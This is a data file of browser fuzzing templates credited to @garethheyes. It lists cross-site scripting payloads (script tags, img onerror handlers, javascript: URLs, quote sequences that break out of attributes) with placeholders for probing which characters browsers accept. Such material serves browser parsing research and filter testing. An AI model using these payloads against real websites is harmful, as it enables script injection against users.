Characters before img	"'`><chrimg src=xxx:x onerror=log(num)>	@garethheyes
Characters before script	'`"><chrscript>log(num)</script>	@garethheyes
Characters in between protocol in js url	<a href="javaschrcript:alert(1)" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed after attribute name	`"'><img src=xxx:x onerrorchr=log(num)>	@garethheyes
Characters that close JS Comments	'"`><script>/* *chrlog(num)// */</script>	@garethheyes
Characters allowed before protocol in js url	<a href="chrjavascript:alert(1)" id="fuzzelementnum">test</a>	@garethheyes
Characters allowed before colon in js url	<a href="javascriptchr:alert(1)" id="fuzzelementnum">test</a>	@garethheyes
NULL Characters inside JavaScript properties	`'"><script>window['logchr'](num)</script>	@garethheyes
Characters allowed before CSS properties	'"`><div id="fuzzelementnum" style="chrcolor:#000000;"></div>	@garethheyes
Characters allowed before a JavaScript function	"`'><script>chrlog(num)</script>	@garethheyes
Characters that close a HTML comment	--><!-- --chr> <img src=xxx:x onerror=log(num)> -->	@garethheyes
Characters allowed before attribute name	`"'><img src=xxx:x chronerror=log(num)>	@garethheyes